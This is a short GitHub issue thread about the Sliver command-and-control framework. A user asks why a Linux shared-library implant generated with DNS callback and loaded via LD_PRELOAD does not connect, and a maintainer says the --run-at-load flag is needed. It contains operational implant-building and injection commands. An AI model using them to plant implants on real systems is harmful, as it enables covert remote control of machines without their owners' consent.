### ISSUE TITLE
how to use LINUX/shared implant ?

### ISSUE THREAD

**Issue by aalswn** [BishopFox/sliver#1025]
I generated code with  "generate -o linux -n (MY dns) -f shared -d --save /root/dns"

And i excute like "LD_PRELOAD=./dnss /bin/ls"

but implants do not connected

listeners are ready but not connect

**Comment by rkervella** [comment]
You need to use `--run-at-load` in your `generate` command to include the default constructor so it can be used with `LD_PRELOAD`.
